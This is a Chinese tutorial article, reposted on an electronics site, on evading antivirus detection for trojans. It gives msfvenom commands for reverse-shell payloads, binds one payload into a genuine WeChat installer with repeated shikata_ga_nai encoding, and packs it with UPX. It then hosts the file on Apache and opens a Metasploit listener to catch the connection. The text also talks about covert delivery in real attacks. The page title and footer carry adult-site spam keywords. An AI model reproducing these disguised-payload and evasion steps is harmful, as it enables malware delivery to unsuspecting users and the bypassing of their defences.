在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

免殺技術與殺軟技術的區別

馬哥Linux運維 ? 來源:FreeBuf ? 作者:FreeBuf ? 2022-07-08 10:49 ? 次閱讀

免殺,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。免殺技術也并不是十惡不赦的,例如,在軟件保護所用的加密產品(比如殼)中,有一些會被殺毒軟件認為是木馬病毒;一些安全領域中的部分安全檢測產品,也會被殺毒軟件誤殺,這時就需要免殺技術來應對這些不穩定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件,生成一個裸奔馬,命名為 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe 》 weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服務,令目標機器能夠訪問下載我們生成的木馬

2.1、kali中是自帶有apache的,啟動apache服務

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶機下訪問192.168.111.132/weinxin.exe,已經下載

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、發現被AV查殺

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在實戰中,直接投遞裸奔馬比較容易引起對方運維人員的警覺,這種方式也比較冒險,所以在投遞之前,要測試制作的木馬是否會引起相關AV的查殺,比如在在線多引擎病毒識別工具中去測試

2.5、這里po一個在線殺毒查殺的網站,virustotal是一個提供免費的可疑文件分析服務的網站,它與傳統殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對您所上傳的文件進行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對我們制作的木馬進行重新編碼,生成一個二進制文件,這個文件運行后,msf編碼器會將原始程序解碼到內存中并執行。

1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個模塊但是一些反病毒廠商關注的重點,為了更好的實現免殺,我們需要自主選擇一個待捆綁程序。在這里選擇是真正的微信安裝包。(也有對裸奔馬進行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術多態,每次生成的攻擊載荷文件都不一樣,有時生成的文件會被查殺,有時不會,所以結合以上思路,生成一個捆綁木馬,并進行shikata_ga_nai編碼)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安裝包放在/root文件夾下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一個Windows環境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時對木馬進行x86/shikata_ga_nai進行多次編碼的方式進行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

參數說明:

-e /指定編碼方式對攻擊載荷進行重新編碼

-x /指定木馬捆綁在哪個可執行程序模板上

-i /指定對目標進行編碼的次數,多次編碼理論上有助于免殺的實現

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務對應的文件夾下,令攻擊機訪問

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻擊機下載后,在msf上創建監聽

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項需要配置

set lhost 192.168.111.132 ///設置一下主機地址

set lport 9999 ///設置下主機端口,為木馬設定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目標機器上點擊偽造的安裝包,沒有打開,因為捆綁木馬并多次編碼后,安裝包源文件已經損壞,但是在攻擊機的,目標機器已經上線

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加殼

upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門程序的特征碼。

壓縮的時候:它首先可執行文件中的可執行數據解壓出來,然后將解壓縮用的代碼附加在前面

運行的時候:將原本的可執行數據解壓出來,然后再運行解壓縮后的數據

1、在kali中內置了upx打包器,輸入upx可以看下參數介紹

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、簡單的命令就是直接upx file,對file文件進行加殼處理,加殼后,因為經過壓縮,文件大小會變小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、還是老樣子,把上面經歷過編碼后,又加殼的weixin安裝包放在apache服務的文件夾下,供目標機器讀取下載(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以創建正常的連接和監聽,成功傳回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免殺技術也被安全技術廠商盯上并開發相對應的檢測技術,所以免殺技術與殺軟技術是互相促進發展的,而且發展速度很快,有些現在可以測試成功的殺軟技術,過段時間就不能用了。免殺技術還需要狠下功夫去研究,接下來也會嘗試python,GO寫的免殺,也會在后續文章中敘述進展!

原文標題:滲透測試-木馬免殺的幾種方式

文章出處:【微信公眾號:馬哥Linux運維】歡迎添加關注!文章轉載請注明出處。

審核編輯:彭靜
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 軟件
    +關注

    關注

    69

    文章

    5137

    瀏覽量

    89015
  • 木馬
    +關注

    關注

    0

    文章

    47

    瀏覽量

    13507
  • python
    +關注

    關注

    56

    文章

    4825

    瀏覽量

    86355
收藏 人收藏

    評論

    相關推薦
    熱點推薦

    顛覆智造:profinet轉ethernet ip網關×發那科×西門子的三國

    顛覆智造: profinet轉ethernet ip網關x 發那科×西門子的“三國”如何引爆汽車產線效能革命? 行業案例:汽車零部件柔性搬運系統集成應用 某汽車零部件工廠需升級生產線,實現不同型
    的頭像 發表于 06-16 19:57 ?46次閱讀
    顛覆智造:profinet轉ethernet ip網關×發那科×西門子的三國<b class='flag-5'>殺</b>

    藍牙5.4與藍牙6.0的核心區別技術特性對比

    藍牙5.4與藍牙6.0的核心區別技術特性對比
    的頭像 發表于 04-02 15:55 ?1.1w次閱讀
    藍牙5.4與藍牙6.0的核心<b class='flag-5'>區別</b>及<b class='flag-5'>技術</b>特性對比

    MPLS和SR傳輸技術區別

    當你在游戲里“五”時卡頓,當你在視頻會議中突然掉線,這些抓狂瞬間的背后,大多是數據傳輸丟包或者延遲造成的。而如何保證不丟包、低延遲,MPLS(Multiprotocol Label
    的頭像 發表于 03-28 10:15 ?370次閱讀
    MPLS和SR傳輸<b class='flag-5'>技術</b>的<b class='flag-5'>區別</b>

    ArcMuse計算技術引擎全面升級

    經過半年多的潛心研發和技術攻關,虹ArcMuse計算技術引擎迎來全面升級,實現多項關鍵技術突破。升級內容涵蓋高清視頻生成、AI模特圖高精度生成、智能試衣和平鋪圖生成等領域,有效攻克了
    的頭像 發表于 12-11 17:34 ?708次閱讀

    錯誤防護技術在車規MCU中應用

    ,遠大于車規芯片要求,ASIL-D等級車規MCU要求小于10 FIT,為了滿足ISO26262要求,需要解決錯誤問題。對于錯誤汽車MCU問題進行研究和探索,采用新技術解決錯誤等車
    發表于 12-06 16:39

    使用獨立ADC和使用MCU的內部ADC來實現模數轉換,有什么性能、技術上的區別嗎?

    使用獨立ADC和使用MCU的內部ADC來實現模數轉換,有什么性能、技術上的區別嗎? 二者有沒有各自的優劣勢?
    發表于 11-22 06:10

    一文掌握UV LED在空凈消領域的主要應用

    近年來,隨著科技的日新月異,LED領域也發展迅速。作為一種新型LED,UV LED憑借其眾多優秀特性而備受矚目。本文將介紹UV LED的主要性能、背后原理以及在空凈消相關領域的應用。 ? 一、走進
    發表于 10-23 14:02 ?1372次閱讀
    一文掌握UV LED在空凈消<b class='flag-5'>殺</b>領域的主要應用

    激光釬焊技術:SMT領域內的現狀與未來發展趨勢(下)

    激光釬焊技術正成為SMT領域的一項關鍵技術,它通過使用激光作為熱源,實現了對電子元件的精密焊接。這項技術以其非接觸式加熱、熱影響區小、快速加熱與冷卻等優勢,特別適合于微小空間和復雜立
    的頭像 發表于 09-30 10:49 ?661次閱讀
    激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術</b>:SMT領域內的現狀與未來發展趨勢(下)

    激光釬焊技術:SMT領域內的現狀與未來發展趨勢(上)

    激光釬焊技術正成為SMT領域的一項關鍵技術,它通過使用激光作為熱源,實現了對電子元件的精密焊接。這項技術以其非接觸式加熱、熱影響區小、快速加熱與冷卻等優勢,特別適合于微小空間和復雜立
    的頭像 發表于 09-29 13:57 ?791次閱讀
    激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術</b>:SMT領域內的現狀與未來發展趨勢(上)

    精密電子焊接挑戰:激光釬焊技術的優勢與應用

    隨著電子工業的快速發展,產品趨向微型化、復雜化和集成化,對焊接技術提出了更高的要求。激光釬焊技術以其非接觸式加熱、局部加熱、自動化潛力大、焊接質量高和可靠性強等優勢,成為解決精密焊接難題的關鍵
    的頭像 發表于 09-26 16:47 ?961次閱讀
    精密電子焊接挑戰:激光<b class='flag-5'>軟</b>釬焊<b class='flag-5'>技術</b>的優勢與應用

    通動力數字孿生技術推動海洋產業變革

    近日,河北省科技計劃項目綜合服務平臺公布了河北省2024年度科技研發平臺專項項目,通動力成功參與京津冀國家技術創新中心河北中心牽頭的重大科研項目——《海洋牧場數字孿生系統研究開發與應用示范》。這一
    的頭像 發表于 09-25 16:59 ?919次閱讀

    PDMS刻蝕技術的應用

    PDMS(聚二甲基硅氧烷)刻蝕技術是一種在高分子科學中廣泛應用的微制造技術。它能夠簡捷有效、高精度地制備出眾多材料的微結構,且技術成本低廉,不需要昂貴的設備和苛刻的環境,具有極好的應
    的頭像 發表于 09-19 14:38 ?1989次閱讀

    開關技術的原理和分類

    開關技術,作為一種先進的電力電子技術,在近年來得到了廣泛的關注和應用。該技術通過優化開關元件的開關過程,實現了降低開關損耗、提高系統效率、減少電磁干擾(EMI)等多重優勢。以下將詳細
    的頭像 發表于 08-14 17:23 ?4703次閱讀

    自電容和互電容傳感技術在應用上的區別是什么?

    自電容和互電容傳感技術在應用上區別主要是什么?互電容可以支持多點觸控,自電容可以嗎?他們之間是互補關系,還是說互電容功能大于自電容功能?
    發表于 07-17 06:34

    醫療獲通用技術集團戰略投資

    近日,通用技術集團所屬資本公司聯合中國國有企業混合所有制改革基金有限公司與東醫療系統股份有限公司(以下簡稱“東醫療”)簽署投資協議,戰略投資東醫療。作為央企和民企攜手發展高端醫療
    發表于 07-03 09:24 ?481次閱讀
    東<b class='flag-5'>軟</b>醫療獲通用<b class='flag-5'>技術</b>集團戰略投資
    主站蜘蛛池模板: 美女屁屁免费视频网站 | 亚洲播播 | 我想看三级特黄 | 黄色在线观看视频网站 | 天天插天天透 | 国产欧美日韩电影 | 天天槽任我槽免费 | 色多多最新地址福利地址 | avtom影院永久地址人人影院 | 欧美一级视频免费 | 美女屁屁免费视频网站 | 色亚洲欧美| 夜夜操天天爽 | 一级片观看 | 桃桃酱无缝丝袜在线播放 | 在线观看视频h | 黄色地址 | 日日干夜夜欢 | 亚洲444444在线观看 | 美女视频永久黄网站免费观看国产 | a级黄视频| 中文字幕一区二区三区在线观看 | 在线播放91灌醉迷j高跟美女 | 亚洲免费播放 | 亚洲天天做夜夜做天天欢人人 | 女的扒开尿口让男人桶爽 | 免费一级特黄3大片视频 | 人与牲动交xxxxbbbb高清 | 午夜传媒| 男女艹逼软件 | 四虎最新在线 | 91成人免费观看 | 无遮挡一级毛片视频 | 欧美一级视频在线高清观看 | 在线观看886影院成人影院 | 国产精品福利午夜一级毛片 | 国内精品免费视频精选在线观看 | 色狠狠色综合吹潮 | 在线视频亚洲一区 | 免费三级网站 | 5566在线观看 |